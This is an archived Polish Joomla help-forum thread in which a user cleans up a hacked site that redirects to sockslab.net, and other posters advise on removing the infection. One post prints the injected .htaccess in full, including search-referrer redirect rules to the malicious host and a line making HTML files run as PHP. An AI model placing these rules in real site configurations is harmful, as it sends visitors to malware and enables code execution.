Zobacz pełną wersję : Był wirus na serwerze (?) - Przenosi na sockslab.net z panelu admina
siristru
05-09-2009, 15:24
Mam następujący kłopot:
Koledzy poprosili nie o pomoc. Ich strona padła po ataku wirusa ( strona jest na serwerze http://www.webd.pl/).
Wyczyściłem katalog w którym przechowywali Joomlę, zrobiłem kopię bazy danych. Zainstalowałem nową Joomlę i przywróciłem bazę danych.
Strona od frontu stanęła. Problem pojawia się kiedy w panelu administracyjnym próbuję zatwierdzić jakieś działanie. Każde kliknięcie zapisz, zastosuj czy nauluj powoduje przeniesienie na stronę:
sockslab . net/in.cgi?7¶meter=sockslab
FF mi zgłasza, że ta strona jest zagrożeniem - dlatego nie wchodziłem na to g***o.
Czy ktoś może mi poradzić jak sobie z tym poradzić?
A pliki Joomla zostały nadpisane?
siristru
05-09-2009, 15:42
Nie nadpisywałem ich - były z Joomla! 1.5.10. Wykasowałem je do czysta i wypakowałem świeżutką paczkę z Joomla 1.5.14. Tylko wpisy w bazie danych są ze starej strony. Ale szukałem w niej zapisów "sockslab" i jest czysto.
Może masz jeszcze ukryty plik .htaccess w głównym folderze serwera? usuń go lub nadpisz tym z Joomla!
Piszę, bo nie napisałeś nawet czy problem nadal występuje.
siristru
06-09-2009, 12:45
@KYCu
Faktycznie w pliku .htaccess jest coś takiego:
ErrorDocument 400 http://sockslab.net/in.cgi?8¶meter=sockslab
ErrorDocument 401 http://sockslab.net/in.cgi?8¶meter=sockslab
ErrorDocument 403 http://sockslab.net/in.cgi?8¶meter=sockslab
ErrorDocument 404 http://sockslab.net/in.cgi?8¶meter=sockslab
ErrorDocument 500 http://sockslab.net/in.cgi?8¶meter=sockslab
AddType application/x-httpd-php .php .htm .html .phtml
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7¶meter=sockslab [R=301,L]
Wywalić wszystkie wpisy z sockslab? czy zastąpić je czymś?
Ten plik znajduje się w katalogu public_html, który zawiera katalog gdzie trzymam Joomlę.
@moje:
Nie podałem odnośnika bo problem występuje jedynie na zapleczu.
Zastąp cały plik, tym standardowym z Joomla.
siristru
06-09-2009, 12:58
Takie pliki są w sumie trzy:
- jeden w katalogu głównym public_html (z wirusem)
- jeden w katalogu forum PHPBB2 by Przemo (z wirusem)
- i ten nowy z Joomli
Czy tym joomlowym zastąpić oba?
w public_html powinieneś mieć właśnie jeden plik .htaccess z joomla, bez rozszerzenia .txt
Ten z phpBB zamień na standardowy z phpBB, o ile takowy jest, jak nie ma, to usuń ten z wirusem.
siristru
06-09-2009, 19:19
Ledwo spróbowałem a wirus znowu pomieszał składnię w plikach php :( Siedzi gdzieś drań na serwerze. Zgłaszam sprawę usługodawcy - niech przeskanuje serwer.
Pliki .htaccess nie zgłasza jako wirusa więc polecą z ręki. Dam znać jak sprawa się potoczyła.
Przy okazji czy te zmiany w składni powoduje ten zapis w .htaccess:
RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7¶meter=sockslab [R=301,L]
Jest to część reguły przekierowującej na wskazaną stronę.
MagicWawa
15-09-2009, 21:15
Najprostszym sposobem byłoby sprawdzić wszystkie pliki na obecność wyrażenia "sockslab". Każdy plik, który zawiera coś podobnego wyczyścić i usunąć te pliki z serwera, a następnie wgrać wyczyszczone na ich miejsce. Pliki możesz sprawdzić na obecność jakiejś frazy np. PSPadem. Mam nadzieję, że sobie poradzisz. Rozumiem, że wiesz, że powinieneś zmienić wszystkie hasła do bazy, ftp, panelu admina... Równocześnie powinieneś wyeksportować bazę danych i również sprawdzić czy nie ma w pliku szukanej frazy.
siristru
16-09-2009, 08:26
Dzięki, spróbuję tak z plikami... to bedzie musiało chyba objąć cały serwer a nie tylko public_html... Bazę już sprawdzałem. Dzięki z tymi radami załatwię wirusa ;)
MagicWawa
16-09-2009, 08:34
Jeśli wirus, trojan czy inne badziewie jest wyżej niż w public_html, to zmień dostawcę hostingu, bo ma zupełnie niezabezpieczony serwer. Ale to jest raczej możliwe tylko u totalnych partaczy lub na localu.
vBulletin® v4.2.5, Prawa przedruku © 2024 vBulletin Solutions, Inc. Wszystkie prawa zastrzeżone.
Tłumaczenie: Polskie Centrum Joomla!